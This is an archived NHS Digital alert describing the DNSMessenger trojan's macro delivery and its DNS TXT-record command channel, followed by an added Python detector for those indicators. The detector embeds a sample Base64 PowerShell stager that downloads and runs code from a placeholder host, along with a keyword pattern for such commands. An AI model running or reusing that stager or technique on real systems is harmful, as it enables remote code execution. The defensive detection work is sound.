
DNSMessenger - C2 Commands via DNS TXT record


This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.

Summary

A new Remote Access Trojan (RAT) has been discovered that downloads PowerShell commands stored inside a domain's DNS TXT record. This makes it difficult to defend against, as DNS is required to resolve domain names to IP addresses.

Affected platforms

The following platforms are known to be affected:

Threat details

The use of the DNS TXT record for Command and Control (C2) communications is not new, but it is an uncommon method for Remote Access Trojans.

The malware is being delivered via spam emails as an attached macro-enabled Word document which purports to be secured by McAfee.

If the victim opens the document and enables the content, a VBA script uses the Document_Open() function to unpack a PowerShell script and execute it. The unpacked script contains instructions used to maintain persistence and perform other operations. The malware then contacts a domain and retrieves its DNS TXT record, which contains a Base64-encoded PowerShell command that loads further components into memory.

In the initial analysis of the malware, a Base64-encoded string 'SourceFireSux' was found. Sourcefire is a Cisco-owned company that offers IDS/IPS and next-generation firewall services designed to protect organisations from DNS- and web-based threats.

DNSMessenger never writes any malicious code to disk, making detection more difficult.

All of the C2 domains used the following top-level domains (TLDs): .me, .pw, .club, .us, .site, .com, .top, and .info. All of the domains consisted of either 4 or 5 random characters. At the time of writing, the domains were no longer active and the malware will be using new, as yet unknown, Command and Control (C2) servers.


Remediation steps

  • Never open email attachments from untrusted sources.
  • Ensure that macros are disabled by default for files from untrusted sources.
  • Make sure that malware detections are kept up-to-date.
  • Monitor DNS for suspicious activity.
  • Make sure cyber-awareness training is kept up-to-date.
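As an added illustration of the "Monitor DNS for suspicious activity" step above (example code written for this page, not part of the original NHS Digital alert), the following Python script scans resolver log lines for the two indicators the threat details describe: TXT lookups for domains made of 4 or 5 random characters under the listed TLDs, and TXT answers that decode from Base64 to PowerShell-like content. The log format (client, query type, query name, answer data), the sample log lines, and the encoded payload are all constructed for the example; the ".invalid" hostname is a placeholder, not an indicator from the alert.

```python
"""Flag DNS TXT traffic matching the DNSMessenger pattern described in the alert.

Example code written for this page; the log format and sample data are constructed.
"""
import base64
import binascii
import re
from typing import Dict, List

# TLDs named in the alert's threat details.
SUSPECT_TLDS = {"me", "pw", "club", "us", "site", "com", "top", "info"}

# PowerShell download-and-execute vocabulary; matching is case-insensitive.
PS_KEYWORDS = re.compile(
    r"\biex\b|invoke-expression|new-object|downloadstring|frombase64string|-enc",
    re.IGNORECASE,
)

# Constructed payload: Base64 of a PowerShell stager pointing at a placeholder host.
CONSTRUCTED_PAYLOAD_B64 = base64.b64encode(
    b"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"
).decode()

# Constructed resolver log in an assumed "<client> <qtype> <qname> <rdata>" format.
SAMPLE_LOG = f"""\
10.0.0.5 A www.example.com 93.184.216.34
10.0.0.7 TXT _dmarc.example.com v=DMARC1;p=reject
10.0.0.7 TXT xk3qz.club dGVzdA==
10.0.0.9 TXT abcde.top {CONSTRUCTED_PAYLOAD_B64}
10.0.0.11 TXT long-corporate-name.com google-site-verification=abc123
10.0.0.12 TXT cdn-updates.example.net {CONSTRUCTED_PAYLOAD_B64}
"""


def is_short_random_domain(qname: str) -> bool:
    """True when the registrable label is 4 or 5 alphanumerics under a listed TLD.

    Assumes a two-label registrable domain (no public-suffix handling); a production
    detector would add entropy or dictionary checks to judge 'randomness'.
    """
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return False
    sld, tld = labels[-2], labels[-1]
    return tld in SUSPECT_TLDS and 4 <= len(sld) <= 5 and sld.isalnum()


def looks_like_base64_powershell(rdata: str) -> bool:
    """True when rdata is valid Base64 whose decoded text contains PowerShell keywords.

    Both UTF-8 and UTF-16LE decodings are tried, since PowerShell's -EncodedCommand
    form carries UTF-16LE text.
    """
    try:
        raw = base64.b64decode(rdata, validate=True)
    except (binascii.Error, ValueError):
        return False
    candidates = [raw.decode("utf-8", errors="ignore")]
    if len(raw) % 2 == 0:
        candidates.append(raw.decode("utf-16-le", errors="ignore"))
    return any(PS_KEYWORDS.search(text) for text in candidates)


def scan_dns_log(log_text: str) -> List[Dict[str, object]]:
    """Return one finding per TXT record line that trips either indicator."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # malformed or unexpected line shape; skip
        client, qtype, qname, rdata = parts
        if qtype.upper() != "TXT":
            continue
        reasons = []
        if is_short_random_domain(qname):
            reasons.append("short-random-domain")
        if looks_like_base64_powershell(rdata):
            reasons.append("base64-powershell")
        if reasons:
            findings.append({"client": client, "qname": qname, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_dns_log(SAMPLE_LOG):
        print(f"{finding['client']} -> {finding['qname']}: {', '.join(finding['reasons'])}")
```

Run against the constructed log, the script flags three lines: the two short random domains under .club and .top, and the .example.net lookup whose answer decodes to a PowerShell stager even though the domain itself looks benign. Legitimate TXT records such as DMARC policies and site-verification tokens are not valid Base64 and pass through untouched, which keeps the noise low enough for the second indicator to be useful on its own.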

Last edited: 17 February 2020 11:29 am